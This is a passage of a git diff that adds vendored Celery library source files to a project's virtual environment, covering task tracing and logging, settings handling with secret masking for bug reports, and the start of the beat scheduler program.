%(name)s[%(id)s] received\ +""" + +#: Format string used to log task success. +LOG_SUCCESS = """\ +Task %(name)s[%(id)s] succeeded in %(runtime)ss: %(return_value)s\ +""" + +#: Format string used to log task failure. +LOG_FAILURE = """\ +Task %(name)s[%(id)s] %(description)s: %(exc)s\ +""" + +#: Format string used to log task internal error. +LOG_INTERNAL_ERROR = """\ +Task %(name)s[%(id)s] %(description)s: %(exc)s\ +""" + +#: Format string used to log task ignored. +LOG_IGNORED = """\ +Task %(name)s[%(id)s] %(description)s\ +""" + +#: Format string used to log task rejected. +LOG_REJECTED = """\ +Task %(name)s[%(id)s] %(exc)s\ +""" + +#: Format string used to log task retry. 
+LOG_RETRY = """\ +Task %(name)s[%(id)s] retry: %(exc)s\ +""" + +log_policy_t = namedtuple( + 'log_policy_t', + ('format', 'description', 'severity', 'traceback', 'mail'), +) + +log_policy_reject = log_policy_t(LOG_REJECTED, 'rejected', logging.WARN, 1, 1) +log_policy_ignore = log_policy_t(LOG_IGNORED, 'ignored', logging.INFO, 0, 0) +log_policy_internal = log_policy_t( + LOG_INTERNAL_ERROR, 'INTERNAL ERROR', logging.CRITICAL, 1, 1, +) +log_policy_expected = log_policy_t( + LOG_FAILURE, 'raised expected', logging.INFO, 0, 0, +) +log_policy_unexpected = log_policy_t( + LOG_FAILURE, 'raised unexpected', logging.ERROR, 1, 1, +) + +send_prerun = signals.task_prerun.send +send_postrun = signals.task_postrun.send +send_success = signals.task_success.send +STARTED = states.STARTED +SUCCESS = states.SUCCESS +IGNORED = states.IGNORED +REJECTED = states.REJECTED +RETRY = states.RETRY +FAILURE = states.FAILURE +EXCEPTION_STATES = states.EXCEPTION_STATES +IGNORE_STATES = frozenset({IGNORED, RETRY, REJECTED}) + +#: set by :func:`setup_worker_optimizations` +_localized = [] +_patched = {} + +trace_ok_t = namedtuple('trace_ok_t', ('retval', 'info', 'runtime', 'retstr')) + + +def info(fmt, context): + """Log 'fmt % context' with severity 'INFO'. + + 'context' is also passed in extra with key 'data' for custom handlers. + """ + logger.info(fmt, context, extra={'data': context}) + + +def task_has_custom(task, attr): + """Return true if the task overrides ``attr``.""" + return mro_lookup(task.__class__, attr, stop={BaseTask, object}, + monkey_patched=['celery.app.task']) + + +def get_log_policy(task, einfo, exc): + if isinstance(exc, Reject): + return log_policy_reject + elif isinstance(exc, Ignore): + return log_policy_ignore + elif einfo.internal: + return log_policy_internal + else: + if task.throws and isinstance(exc, task.throws): + return log_policy_expected + return log_policy_unexpected + + +def get_task_name(request, default): + """Use 'shadow' in request for the task name if applicable.""" + # request.shadow could be None or an empty string. + # If so, we should use default. + return getattr(request, 'shadow', None) or default + + +class TraceInfo: + """Information about task execution.""" + + __slots__ = ('state', 'retval') + + def __init__(self, state, retval=None): + self.state = state + self.retval = retval + + def handle_error_state(self, task, req, + eager=False, call_errbacks=True): + if task.ignore_result: + store_errors = task.store_errors_even_if_ignored + elif eager and task.store_eager_result: + store_errors = True + else: + store_errors = not eager + + return { + RETRY: self.handle_retry, + FAILURE: self.handle_failure, + }[self.state](task, req, + store_errors=store_errors, + call_errbacks=call_errbacks) + + def handle_reject(self, task, req, **kwargs): + self._log_error(task, req, ExceptionInfo()) + + def handle_ignore(self, task, req, **kwargs): + self._log_error(task, req, ExceptionInfo()) + + def handle_retry(self, task, req, store_errors=True, **kwargs): + """Handle retry exception.""" + # the exception raised is the Retry semi-predicate, + # and it's exc' attribute is the original exception raised (if any). 
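+        # here self.retval is that Retry instance; capture the traceback of the
+        # exception currently being handled so it can be reported alongside it.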
+ type_, _, tb = sys.exc_info() + try: + reason = self.retval + einfo = ExceptionInfo((type_, reason, tb)) + if store_errors: + task.backend.mark_as_retry( + req.id, reason.exc, einfo.traceback, request=req, + ) + task.on_retry(reason.exc, req.id, req.args, req.kwargs, einfo) + signals.task_retry.send(sender=task, request=req, + reason=reason, einfo=einfo) + info(LOG_RETRY, { + 'id': req.id, + 'name': get_task_name(req, task.name), + 'exc': str(reason), + }) + return einfo + finally: + del tb + + def handle_failure(self, task, req, store_errors=True, call_errbacks=True): + """Handle exception.""" + orig_exc = self.retval + + exc = get_pickleable_exception(orig_exc) + if exc.__traceback__ is None: + # `get_pickleable_exception` may have created a new exception without + # a traceback. + _, _, exc.__traceback__ = sys.exc_info() + + exc_type = get_pickleable_etype(type(orig_exc)) + + # make sure we only send pickleable exceptions back to parent. + einfo = ExceptionInfo(exc_info=(exc_type, exc, exc.__traceback__)) + + task.backend.mark_as_failure( + req.id, exc, einfo.traceback, + request=req, store_result=store_errors, + call_errbacks=call_errbacks, + ) + + task.on_failure(exc, req.id, req.args, req.kwargs, einfo) + signals.task_failure.send(sender=task, task_id=req.id, + exception=exc, args=req.args, + kwargs=req.kwargs, + traceback=exc.__traceback__, + einfo=einfo) + self._log_error(task, req, einfo) + return einfo + + def _log_error(self, task, req, einfo): + eobj = einfo.exception = get_pickled_exception(einfo.exception) + if isinstance(eobj, ExceptionWithTraceback): + eobj = einfo.exception = eobj.exc + exception, traceback, exc_info, sargs, skwargs = ( + safe_repr(eobj), + safe_str(einfo.traceback), + einfo.exc_info, + req.get('argsrepr') or safe_repr(req.args), + req.get('kwargsrepr') or safe_repr(req.kwargs), + ) + policy = get_log_policy(task, einfo, eobj) + + context = { + 'hostname': req.hostname, + 'id': req.id, + 'name': get_task_name(req, task.name), + 'exc': exception, + 'traceback': traceback, + 'args': sargs, + 'kwargs': skwargs, + 'description': policy.description, + 'internal': einfo.internal, + } + + logger.log(policy.severity, policy.format.strip(), context, + exc_info=exc_info if policy.traceback else None, + extra={'data': context}) + + +def traceback_clear(exc=None): + # Cleared Tb, but einfo still has a reference to Traceback. + # exc cleans up the Traceback at the last moment that can be revealed. + tb = None + if exc is not None: + if hasattr(exc, '__traceback__'): + tb = exc.__traceback__ + else: + _, _, tb = sys.exc_info() + else: + _, _, tb = sys.exc_info() + + while tb is not None: + try: + tb.tb_frame.clear() + tb.tb_frame.f_locals + except RuntimeError: + # Ignore the exception raised if the frame is still executing. + pass + tb = tb.tb_next + + +def build_tracer( + name: str, + task: Union[celery.Task, celery.local.PromiseProxy], + loader: Optional[celery.loaders.app.AppLoader] = None, + hostname: Optional[str] = None, + store_errors: bool = True, + Info: Type[TraceInfo] = TraceInfo, + eager: bool = False, + propagate: bool = False, + app: Optional[celery.Celery] = None, + monotonic: Callable[[], int] = time.monotonic, + trace_ok_t: Type[trace_ok_t] = trace_ok_t, + IGNORE_STATES: FrozenSet[str] = IGNORE_STATES) -> \ + Callable[[str, Tuple[Any, ...], Dict[str, Any], Any], trace_ok_t]: + """Return a function that traces task execution. + + Catches all exceptions and updates result backend with the + state and result. 
+ + If the call was successful, it saves the result to the task result + backend, and sets the task status to `"SUCCESS"`. + + If the call raises :exc:`~@Retry`, it extracts + the original exception, uses that as the result and sets the task state + to `"RETRY"`. + + If the call results in an exception, it saves the exception as the task + result, and sets the task state to `"FAILURE"`. + + Return a function that takes the following arguments: + + :param uuid: The id of the task. + :param args: List of positional args to pass on to the function. + :param kwargs: Keyword arguments mapping to pass on to the function. + :keyword request: Request dict. + + """ + + # pylint: disable=too-many-statements + + # If the task doesn't define a custom __call__ method + # we optimize it away by simply calling the run method directly, + # saving the extra method call and a line less in the stack trace. + fun = task if task_has_custom(task, '__call__') else task.run + + loader = loader or app.loader + ignore_result = task.ignore_result + track_started = task.track_started + track_started = not eager and (task.track_started and not ignore_result) + + # #6476 + if eager and not ignore_result and task.store_eager_result: + publish_result = True + else: + publish_result = not eager and not ignore_result + + deduplicate_successful_tasks = ((app.conf.task_acks_late or task.acks_late) + and app.conf.worker_deduplicate_successful_tasks + and app.backend.persistent) + + hostname = hostname or gethostname() + inherit_parent_priority = app.conf.task_inherit_parent_priority + + loader_task_init = loader.on_task_init + loader_cleanup = loader.on_process_cleanup + + task_before_start = None + task_on_success = None + task_after_return = None + if task_has_custom(task, 'before_start'): + task_before_start = task.before_start + if task_has_custom(task, 'on_success'): + task_on_success = task.on_success + if task_has_custom(task, 'after_return'): + task_after_return = task.after_return + + pid = os.getpid() + + request_stack = task.request_stack + push_request = request_stack.push + pop_request = request_stack.pop + push_task = _task_stack.push + pop_task = _task_stack.pop + _does_info = logger.isEnabledFor(logging.INFO) + resultrepr_maxsize = task.resultrepr_maxsize + + prerun_receivers = signals.task_prerun.receivers + postrun_receivers = signals.task_postrun.receivers + success_receivers = signals.task_success.receivers + + from celery import canvas + signature = canvas.maybe_signature # maybe_ does not clone if already + + def on_error( + request: celery.app.task.Context, + exc: Union[Exception, Type[Exception]], + state: str = FAILURE, + call_errbacks: bool = True) -> Tuple[Info, Any, Any, Any]: + """Handle any errors raised by a `Task`'s execution.""" + if propagate: + raise + I = Info(state, exc) + R = I.handle_error_state( + task, request, eager=eager, call_errbacks=call_errbacks, + ) + return I, R, I.state, I.retval + + def trace_task( + uuid: str, + args: Sequence[Any], + kwargs: Dict[str, Any], + request: Optional[Dict[str, Any]] = None) -> trace_ok_t: + """Execute and trace a `Task`.""" + + # R - is the possibly prepared return value. + # I - is the Info object. + # T - runtime + # Rstr - textual representation of return value + # retval - is the always unmodified return value. + # state - is the resulting task state. 
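+        # Every return path below packs these into trace_ok_t(R, I, T, Rstr);
+        # e.g. a hypothetical add(2, 2) task that succeeds yields roughly
+        # trace_ok_t(retval=4, info=None, runtime=<seconds>, retstr='4').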
+ + # This function is very long because we've unrolled all the calls + # for performance reasons, and because the function is so long + # we want the main variables (I, and R) to stand out visually from the + # the rest of the variables, so breaking PEP8 is worth it ;) + R = I = T = Rstr = retval = state = None + task_request = None + time_start = monotonic() + try: + try: + kwargs.items + except AttributeError: + raise InvalidTaskError( + 'Task keyword arguments is not a mapping') + + task_request = Context(request or {}, args=args, + called_directly=False, kwargs=kwargs) + + redelivered = (task_request.delivery_info + and task_request.delivery_info.get('redelivered', False)) + if deduplicate_successful_tasks and redelivered: + if task_request.id in successful_requests: + return trace_ok_t(R, I, T, Rstr) + r = AsyncResult(task_request.id, app=app) + + try: + state = r.state + except BackendGetMetaError: + pass + else: + if state == SUCCESS: + info(LOG_IGNORED, { + 'id': task_request.id, + 'name': get_task_name(task_request, name), + 'description': 'Task already completed successfully.' + }) + return trace_ok_t(R, I, T, Rstr) + + push_task(task) + root_id = task_request.root_id or uuid + task_priority = task_request.delivery_info.get('priority') if \ + inherit_parent_priority else None + push_request(task_request) + try: + # -*- PRE -*- + if prerun_receivers: + send_prerun(sender=task, task_id=uuid, task=task, + args=args, kwargs=kwargs) + loader_task_init(uuid, task) + if track_started: + task.backend.store_result( + uuid, {'pid': pid, 'hostname': hostname}, STARTED, + request=task_request, + ) + + # -*- TRACE -*- + try: + if task_before_start: + task_before_start(uuid, args, kwargs) + + R = retval = fun(*args, **kwargs) + state = SUCCESS + except Reject as exc: + I, R = Info(REJECTED, exc), ExceptionInfo(internal=True) + state, retval = I.state, I.retval + I.handle_reject(task, task_request) + traceback_clear(exc) + except Ignore as exc: + I, R = Info(IGNORED, exc), ExceptionInfo(internal=True) + state, retval = I.state, I.retval + I.handle_ignore(task, task_request) + traceback_clear(exc) + except Retry as exc: + I, R, state, retval = on_error( + task_request, exc, RETRY, call_errbacks=False) + traceback_clear(exc) + except Exception as exc: + I, R, state, retval = on_error(task_request, exc) + traceback_clear(exc) + except BaseException: + raise + else: + try: + # callback tasks must be applied before the result is + # stored, so that result.children is populated. 
+ + # groups are called inline and will store trail + # separately, so need to call them separately + # so that the trail's not added multiple times :( + # (Issue #1936) + callbacks = task.request.callbacks + if callbacks: + if len(task.request.callbacks) > 1: + sigs, groups = [], [] + for sig in callbacks: + sig = signature(sig, app=app) + if isinstance(sig, group): + groups.append(sig) + else: + sigs.append(sig) + for group_ in groups: + group_.apply_async( + (retval,), + parent_id=uuid, root_id=root_id, + priority=task_priority + ) + if sigs: + group(sigs, app=app).apply_async( + (retval,), + parent_id=uuid, root_id=root_id, + priority=task_priority + ) + else: + signature(callbacks[0], app=app).apply_async( + (retval,), parent_id=uuid, root_id=root_id, + priority=task_priority + ) + + # execute first task in chain + chain = task_request.chain + if chain: + _chsig = signature(chain.pop(), app=app) + _chsig.apply_async( + (retval,), chain=chain, + parent_id=uuid, root_id=root_id, + priority=task_priority + ) + task.backend.mark_as_done( + uuid, retval, task_request, publish_result, + ) + except EncodeError as exc: + I, R, state, retval = on_error(task_request, exc) + else: + Rstr = saferepr(R, resultrepr_maxsize) + T = monotonic() - time_start + if task_on_success: + task_on_success(retval, uuid, args, kwargs) + if success_receivers: + send_success(sender=task, result=retval) + if _does_info: + info(LOG_SUCCESS, { + 'id': uuid, + 'name': get_task_name(task_request, name), + 'return_value': Rstr, + 'runtime': T, + 'args': task_request.get('argsrepr') or safe_repr(args), + 'kwargs': task_request.get('kwargsrepr') or safe_repr(kwargs), + }) + + # -* POST *- + if state not in IGNORE_STATES: + if task_after_return: + task_after_return( + state, retval, uuid, args, kwargs, None, + ) + finally: + try: + if postrun_receivers: + send_postrun(sender=task, task_id=uuid, task=task, + args=args, kwargs=kwargs, + retval=retval, state=state) + finally: + pop_task() + pop_request() + if not eager: + try: + task.backend.process_cleanup() + loader_cleanup() + except (KeyboardInterrupt, SystemExit, MemoryError): + raise + except Exception as exc: + logger.error('Process cleanup failed: %r', exc, + exc_info=True) + except MemoryError: + raise + except Exception as exc: + _signal_internal_error(task, uuid, args, kwargs, request, exc) + if eager: + raise + R = report_internal_error(task, exc) + if task_request is not None: + I, _, _, _ = on_error(task_request, exc) + return trace_ok_t(R, I, T, Rstr) + + return trace_task + + +def trace_task(task, uuid, args, kwargs, request=None, **opts): + """Trace task execution.""" + request = {} if not request else request + try: + if task.__trace__ is None: + task.__trace__ = build_tracer(task.name, task, **opts) + return task.__trace__(uuid, args, kwargs, request) + except Exception as exc: + _signal_internal_error(task, uuid, args, kwargs, request, exc) + return trace_ok_t(report_internal_error(task, exc), TraceInfo(FAILURE, exc), 0.0, None) + + +def _signal_internal_error(task, uuid, args, kwargs, request, exc): + """Send a special `internal_error` signal to the app for outside body errors.""" + try: + _, _, tb = sys.exc_info() + einfo = ExceptionInfo() + einfo.exception = get_pickleable_exception(einfo.exception) + einfo.type = get_pickleable_etype(einfo.type) + signals.task_internal_error.send( + sender=task, + task_id=uuid, + args=args, + kwargs=kwargs, + request=request, + exception=exc, + traceback=tb, + einfo=einfo, + ) + finally: + del tb + + +def 
trace_task_ret(name, uuid, request, body, content_type, + content_encoding, loads=loads_message, app=None, + **extra_request): + app = app or current_app._get_current_object() + embed = None + if content_type: + accept = prepare_accept_content(app.conf.accept_content) + args, kwargs, embed = loads( + body, content_type, content_encoding, accept=accept, + ) + else: + args, kwargs, embed = body + hostname = gethostname() + request.update({ + 'args': args, 'kwargs': kwargs, + 'hostname': hostname, 'is_eager': False, + }, **embed or {}) + R, I, T, Rstr = trace_task(app.tasks[name], + uuid, args, kwargs, request, app=app) + return (1, R, T) if I else (0, Rstr, T) + + +def fast_trace_task(task, uuid, request, body, content_type, + content_encoding, loads=loads_message, _loc=None, + hostname=None, **_): + _loc = _localized if not _loc else _loc + embed = None + tasks, accept, hostname = _loc + if content_type: + args, kwargs, embed = loads( + body, content_type, content_encoding, accept=accept, + ) + else: + args, kwargs, embed = body + request.update({ + 'args': args, 'kwargs': kwargs, + 'hostname': hostname, 'is_eager': False, + }, **embed or {}) + R, I, T, Rstr = tasks[task].__trace__( + uuid, args, kwargs, request, + ) + return (1, R, T) if I else (0, Rstr, T) + + +def report_internal_error(task, exc): + _type, _value, _tb = sys.exc_info() + try: + _value = task.backend.prepare_exception(exc, 'pickle') + exc_info = ExceptionInfo((_type, _value, _tb), internal=True) + warn(RuntimeWarning( + 'Exception raised outside body: {!r}:\n{}'.format( + exc, exc_info.traceback))) + return exc_info + finally: + del _tb + + +def setup_worker_optimizations(app, hostname=None): + """Setup worker related optimizations.""" + hostname = hostname or gethostname() + + # make sure custom Task.__call__ methods that calls super + # won't mess up the request/task stack. + _install_stack_protection() + + # all new threads start without a current app, so if an app is not + # passed on to the thread it will fall back to the "default app", + # which then could be the wrong app. So for the worker + # we set this to always return our app. This is a hack, + # and means that only a single app can be used for workers + # running in the same process. + app.set_current() + app.set_default() + + # evaluate all task classes by finalizing the app. + app.finalize() + + # set fast shortcut to task registry + _localized[:] = [ + app._tasks, + prepare_accept_content(app.conf.accept_content), + hostname, + ] + + app.use_fast_trace_task = True + + +def reset_worker_optimizations(app=current_app): + """Reset previously configured optimizations.""" + try: + delattr(BaseTask, '_stackprotected') + except AttributeError: + pass + try: + BaseTask.__call__ = _patched.pop('BaseTask.__call__') + except KeyError: + pass + app.use_fast_trace_task = False + + +def _install_stack_protection(): + # Patches BaseTask.__call__ in the worker to handle the edge case + # where people override it and also call super. + # + # - The worker optimizes away BaseTask.__call__ and instead + # calls task.run directly. + # - so with the addition of current_task and the request stack + # BaseTask.__call__ now pushes to those stacks so that + # they work when tasks are called directly. + # + # The worker only optimizes away __call__ in the case + # where it hasn't been overridden, so the request/task stack + # will blow if a custom task class defines __call__ and also + # calls super(). 
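+    # The guard below makes the patch idempotent: once BaseTask is marked as
+    # _stackprotected, calling this function again is a no-op.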
+ if not getattr(BaseTask, '_stackprotected', False): + _patched['BaseTask.__call__'] = orig = BaseTask.__call__ + + def __protected_call__(self, *args, **kwargs): + stack = self.request_stack + req = stack.top + if req and not req._protected and \ + len(stack) == 1 and not req.called_directly: + req._protected = 1 + return self.run(*args, **kwargs) + return orig(self, *args, **kwargs) + BaseTask.__call__ = __protected_call__ + BaseTask._stackprotected = True diff --git a/env/Lib/site-packages/celery/app/utils.py b/env/Lib/site-packages/celery/app/utils.py new file mode 100644 index 00000000..0dd3409d --- /dev/null +++ b/env/Lib/site-packages/celery/app/utils.py @@ -0,0 +1,415 @@ +"""App utilities: Compat settings, bug-report tool, pickling apps.""" +import os +import platform as _platform +import re +from collections import namedtuple +from collections.abc import Mapping +from copy import deepcopy +from types import ModuleType + +from kombu.utils.url import maybe_sanitize_url + +from celery.exceptions import ImproperlyConfigured +from celery.platforms import pyimplementation +from celery.utils.collections import ConfigurationView +from celery.utils.imports import import_from_cwd, qualname, symbol_by_name +from celery.utils.text import pretty + +from .defaults import _OLD_DEFAULTS, _OLD_SETTING_KEYS, _TO_NEW_KEY, _TO_OLD_KEY, DEFAULTS, SETTING_KEYS, find + +__all__ = ( + 'Settings', 'appstr', 'bugreport', + 'filter_hidden_settings', 'find_app', +) + +#: Format used to generate bug-report information. +BUGREPORT_INFO = """ +software -> celery:{celery_v} kombu:{kombu_v} py:{py_v} + billiard:{billiard_v} {driver_v} +platform -> system:{system} arch:{arch} + kernel version:{kernel_version} imp:{py_i} +loader -> {loader} +settings -> transport:{transport} results:{results} + +{human_settings} +""" + +HIDDEN_SETTINGS = re.compile( + 'API|TOKEN|KEY|SECRET|PASS|PROFANITIES_LIST|SIGNATURE|DATABASE', + re.IGNORECASE, +) + +E_MIX_OLD_INTO_NEW = """ + +Cannot mix new and old setting keys, please rename the +following settings to the new format: + +{renames} + +""" + +E_MIX_NEW_INTO_OLD = """ + +Cannot mix new setting names with old setting names, please +rename the following settings to use the old format: + +{renames} + +Or change all of the settings to use the new format :) + +""" + +FMT_REPLACE_SETTING = '{replace:<36} -> {with_}' + + +def appstr(app): + """String used in __repr__ etc, to id app instances.""" + return f'{app.main or "__main__"} at {id(app):#x}' + + +class Settings(ConfigurationView): + """Celery settings object. + + .. seealso: + + :ref:`configuration` for a full list of configuration keys. 
+ + """ + + def __init__(self, *args, deprecated_settings=None, **kwargs): + super().__init__(*args, **kwargs) + + self.deprecated_settings = deprecated_settings + + @property + def broker_read_url(self): + return ( + os.environ.get('CELERY_BROKER_READ_URL') or + self.get('broker_read_url') or + self.broker_url + ) + + @property + def broker_write_url(self): + return ( + os.environ.get('CELERY_BROKER_WRITE_URL') or + self.get('broker_write_url') or + self.broker_url + ) + + @property + def broker_url(self): + return ( + os.environ.get('CELERY_BROKER_URL') or + self.first('broker_url', 'broker_host') + ) + + @property + def result_backend(self): + return ( + os.environ.get('CELERY_RESULT_BACKEND') or + self.first('result_backend', 'CELERY_RESULT_BACKEND') + ) + + @property + def task_default_exchange(self): + return self.first( + 'task_default_exchange', + 'task_default_queue', + ) + + @property + def task_default_routing_key(self): + return self.first( + 'task_default_routing_key', + 'task_default_queue', + ) + + @property + def timezone(self): + # this way we also support django's time zone. + return self.first('timezone', 'TIME_ZONE') + + def without_defaults(self): + """Return the current configuration, but without defaults.""" + # the last stash is the default settings, so just skip that + return Settings({}, self.maps[:-1]) + + def value_set_for(self, key): + return key in self.without_defaults() + + def find_option(self, name, namespace=''): + """Search for option by name. + + Example: + >>> from proj.celery import app + >>> app.conf.find_option('disable_rate_limits') + ('worker', 'prefetch_multiplier', + bool default->False>)) + + Arguments: + name (str): Name of option, cannot be partial. + namespace (str): Preferred name-space (``None`` by default). + Returns: + Tuple: of ``(namespace, key, type)``. + """ + return find(name, namespace) + + def find_value_for_key(self, name, namespace='celery'): + """Shortcut to ``get_by_parts(*find_option(name)[:-1])``.""" + return self.get_by_parts(*self.find_option(name, namespace)[:-1]) + + def get_by_parts(self, *parts): + """Return the current value for setting specified as a path. + + Example: + >>> from proj.celery import app + >>> app.conf.get_by_parts('worker', 'disable_rate_limits') + False + """ + return self['_'.join(part for part in parts if part)] + + def finalize(self): + # See PendingConfiguration in celery/app/base.py + # first access will read actual configuration. 
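+        # looking up a key that cannot exist forces the lazy PendingConfiguration
+        # to resolve; the expected KeyError is swallowed below.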
+ try: + self['__bogus__'] + except KeyError: + pass + return self + + def table(self, with_defaults=False, censored=True): + filt = filter_hidden_settings if censored else lambda v: v + dict_members = dir(dict) + self.finalize() + settings = self if with_defaults else self.without_defaults() + return filt({ + k: v for k, v in settings.items() + if not k.startswith('_') and k not in dict_members + }) + + def humanize(self, with_defaults=False, censored=True): + """Return a human readable text showing configuration changes.""" + return '\n'.join( + f'{key}: {pretty(value, width=50)}' + for key, value in self.table(with_defaults, censored).items()) + + def maybe_warn_deprecated_settings(self): + # TODO: Remove this method in Celery 6.0 + if self.deprecated_settings: + from celery.app.defaults import _TO_NEW_KEY + from celery.utils import deprecated + for setting in self.deprecated_settings: + deprecated.warn(description=f'The {setting!r} setting', + removal='6.0.0', + alternative=f'Use the {_TO_NEW_KEY[setting]} instead') + + return True + + return False + + +def _new_key_to_old(key, convert=_TO_OLD_KEY.get): + return convert(key, key) + + +def _old_key_to_new(key, convert=_TO_NEW_KEY.get): + return convert(key, key) + + +_settings_info_t = namedtuple('settings_info_t', ( + 'defaults', 'convert', 'key_t', 'mix_error', +)) + +_settings_info = _settings_info_t( + DEFAULTS, _TO_NEW_KEY, _old_key_to_new, E_MIX_OLD_INTO_NEW, +) +_old_settings_info = _settings_info_t( + _OLD_DEFAULTS, _TO_OLD_KEY, _new_key_to_old, E_MIX_NEW_INTO_OLD, +) + + +def detect_settings(conf, preconf=None, ignore_keys=None, prefix=None, + all_keys=None, old_keys=None): + preconf = {} if not preconf else preconf + ignore_keys = set() if not ignore_keys else ignore_keys + all_keys = SETTING_KEYS if not all_keys else all_keys + old_keys = _OLD_SETTING_KEYS if not old_keys else old_keys + + source = conf + if conf is None: + source, conf = preconf, {} + have = set(source.keys()) - ignore_keys + is_in_new = have.intersection(all_keys) + is_in_old = have.intersection(old_keys) + + info = None + if is_in_new: + # have new setting names + info, left = _settings_info, is_in_old + if is_in_old and len(is_in_old) > len(is_in_new): + # Majority of the settings are old. + info, left = _old_settings_info, is_in_new + if is_in_old: + # have old setting names, or a majority of the names are old. + if not info: + info, left = _old_settings_info, is_in_new + if is_in_new and len(is_in_new) > len(is_in_old): + # Majority of the settings are new + info, left = _settings_info, is_in_old + else: + # no settings, just use new format. + info, left = _settings_info, is_in_old + + if prefix: + # always use new format if prefix is used. + info, left = _settings_info, set() + + # only raise error for keys that the user didn't provide two keys + # for (e.g., both ``result_expires`` and ``CELERY_TASK_RESULT_EXPIRES``). + really_left = {key for key in left if info.convert[key] not in have} + if really_left: + # user is mixing old/new, or new/old settings, give renaming + # suggestions. 
+ raise ImproperlyConfigured(info.mix_error.format(renames='\n'.join( + FMT_REPLACE_SETTING.format(replace=key, with_=info.convert[key]) + for key in sorted(really_left) + ))) + + preconf = {info.convert.get(k, k): v for k, v in preconf.items()} + defaults = dict(deepcopy(info.defaults), **preconf) + return Settings( + preconf, [conf, defaults], + (_old_key_to_new, _new_key_to_old), + deprecated_settings=is_in_old, + prefix=prefix, + ) + + +class AppPickler: + """Old application pickler/unpickler (< 3.1).""" + + def __call__(self, cls, *args): + kwargs = self.build_kwargs(*args) + app = self.construct(cls, **kwargs) + self.prepare(app, **kwargs) + return app + + def prepare(self, app, **kwargs): + app.conf.update(kwargs['changes']) + + def build_kwargs(self, *args): + return self.build_standard_kwargs(*args) + + def build_standard_kwargs(self, main, changes, loader, backend, amqp, + events, log, control, accept_magic_kwargs, + config_source=None): + return {'main': main, 'loader': loader, 'backend': backend, + 'amqp': amqp, 'changes': changes, 'events': events, + 'log': log, 'control': control, 'set_as_current': False, + 'config_source': config_source} + + def construct(self, cls, **kwargs): + return cls(**kwargs) + + +def _unpickle_app(cls, pickler, *args): + """Rebuild app for versions 2.5+.""" + return pickler()(cls, *args) + + +def _unpickle_app_v2(cls, kwargs): + """Rebuild app for versions 3.1+.""" + kwargs['set_as_current'] = False + return cls(**kwargs) + + +def filter_hidden_settings(conf): + """Filter sensitive settings.""" + def maybe_censor(key, value, mask='*' * 8): + if isinstance(value, Mapping): + return filter_hidden_settings(value) + if isinstance(key, str): + if HIDDEN_SETTINGS.search(key): + return mask + elif 'broker_url' in key.lower(): + from kombu import Connection + return Connection(value).as_uri(mask=mask) + elif 'backend' in key.lower(): + return maybe_sanitize_url(value, mask=mask) + + return value + + return {k: maybe_censor(k, v) for k, v in conf.items()} + + +def bugreport(app): + """Return a string containing information useful in bug-reports.""" + import billiard + import kombu + + import celery + + try: + conn = app.connection() + driver_v = '{}:{}'.format(conn.transport.driver_name, + conn.transport.driver_version()) + transport = conn.transport_cls + except Exception: # pylint: disable=broad-except + transport = driver_v = '' + + return BUGREPORT_INFO.format( + system=_platform.system(), + arch=', '.join(x for x in _platform.architecture() if x), + kernel_version=_platform.release(), + py_i=pyimplementation(), + celery_v=celery.VERSION_BANNER, + kombu_v=kombu.__version__, + billiard_v=billiard.__version__, + py_v=_platform.python_version(), + driver_v=driver_v, + transport=transport, + results=maybe_sanitize_url(app.conf.result_backend or 'disabled'), + human_settings=app.conf.humanize(), + loader=qualname(app.loader.__class__), + ) + + +def find_app(app, symbol_by_name=symbol_by_name, imp=import_from_cwd): + """Find app by name.""" + from .base import Celery + + try: + sym = symbol_by_name(app, imp=imp) + except AttributeError: + # last part was not an attribute, but a module + sym = imp(app) + if isinstance(sym, ModuleType) and ':' not in app: + try: + found = sym.app + if isinstance(found, ModuleType): + raise AttributeError() + except AttributeError: + try: + found = sym.celery + if isinstance(found, ModuleType): + raise AttributeError( + "attribute 'celery' is the celery module not the instance of celery") + except AttributeError: + if getattr(sym, 
'__path__', None): + try: + return find_app( + f'{app}.celery', + symbol_by_name=symbol_by_name, imp=imp, + ) + except ImportError: + pass + for suspect in vars(sym).values(): + if isinstance(suspect, Celery): + return suspect + raise + else: + return found + else: + return found + return sym diff --git a/env/Lib/site-packages/celery/apps/__init__.py b/env/Lib/site-packages/celery/apps/__init__.py new file mode 100644 index 00000000..e69de29b diff --git a/env/Lib/site-packages/celery/apps/beat.py b/env/Lib/site-packages/celery/apps/beat.py new file mode 100644 index 00000000..7258ac85 --- /dev/null +++ b/env/Lib/site-packages/celery/apps/beat.py @@ -0,0 +1,160 @@ +"""Beat command-line program. + +This module is the 'program-version' of :mod:`celery.beat`. + +It does everything necessary to run that module +as an actual application, like installing signal handlers +and so on. +""" +from __future__ import annotations + +import numbers +import socket +import sys +from datetime import datetime +from signal import Signals +from types import FrameType +from typing import Any + +from celery import VERSION_BANNER, Celery, beat, platforms +from celery.utils.imports import qualname +from celery.utils.log import LOG_LEVELS, get_logger +from celery.utils.time import humanize_seconds + +__all__ = ('Beat',) + +STARTUP_INFO_FMT = """ +LocalTime -> {timestamp} +Configuration -> + . broker -> {conninfo} + . loader -> {loader} + . scheduler -> {scheduler} +{scheduler_info} + . logfile -> {logfile}@%{loglevel} + . maxinterval -> {hmax_interval} ({max_interval}s) +""".strip() + +logger = get_logger('celery.beat') + + +class Beat: + """Beat as a service.""" + + Service = beat.Service + app: Celery = None + + def __init__(self, max_interval: int | None = None, app: Celery | None = None, + socket_timeout: int = 30, pidfile: str | None = None, no_color: bool | None = None, + loglevel: str = 'WARN', logfile: str | None = None, schedule: str | None = None, + scheduler: str | None = None, + scheduler_cls: str | None = None, # XXX use scheduler + redirect_stdouts: bool | None = None, + redirect_stdouts_level: str | None = None, + quiet: bool = False, **kwargs: Any) -> None: + self.app = app = app or self.app + either = self.app.either + self.loglevel = loglevel + self.logfile = logfile + self.schedule = either('beat_schedule_filename', schedule) + self.scheduler_cls = either( + 'beat_scheduler', scheduler, scheduler_cls) + self.redirect_stdouts = either( + 'worker_redirect_stdouts', redirect_stdouts) + self.redirect_stdouts_level = either( + 'worker_redirect_stdouts_level', redirect_stdouts_level) + self.quiet = quiet + + self.max_interval = max_interval + self.socket_timeout = socket_timeout + self.no_color = no_color + self.colored = app.log.colored( + self.logfile, + enabled=not no_color if no_color is not None else no_color, + ) + self.pidfile = pidfile + if not isinstance(self.loglevel, numbers.Integral): + self.loglevel = LOG_LEVELS[self.loglevel.upper()] + + def run(self) -> None: + if not self.quiet: + print(str(self.colored.cyan( + f'celery beat v{VERSION_BANNER} is starting.'))) + self.init_loader() + self.set_process_title() + self.start_scheduler() + + def setup_logging(self, colorize: bool | None = None) 